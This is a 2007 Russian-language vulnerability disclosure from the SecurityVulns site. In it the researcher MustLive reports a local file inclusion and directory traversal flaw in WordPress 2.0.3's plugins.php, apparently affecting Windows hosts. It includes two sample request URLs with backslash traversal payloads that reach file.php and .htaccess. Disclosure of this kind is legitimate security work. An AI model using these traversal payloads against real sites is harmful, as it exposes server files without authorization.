Информационная безопасность

Уведомление о безопасности: Vulnerability in WordPress
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Inout Meta Searh engine Remote Code Execution

  RFI In Script FlashChat_v479

  [Full-disclosure] [SECURITY] [DSA 1298-1] New otrs2 packages fix cross-site scripting

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:28 мая 2007 г.
Subject:Vulnerability in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Local file include и Directory traversal уязвимости в WordPress.

Уязвимость в файле plugins.php движка.

Local file include и Directory traversal:

http://site/wp-admin/plugins.php?page=\..\..\file.php
http://site/wp-admin/plugins.php?page=\..\..\.htaccess

Уязвимость имеет место в WordPress версии 2.0.3 (и потенциально в последующих версиях).

Похоже, что уязвимость работает лишь на Windows системах (в которых используются обратные слеши). Т.к. на Linux данная уязвимость не срабатывает.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/979/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server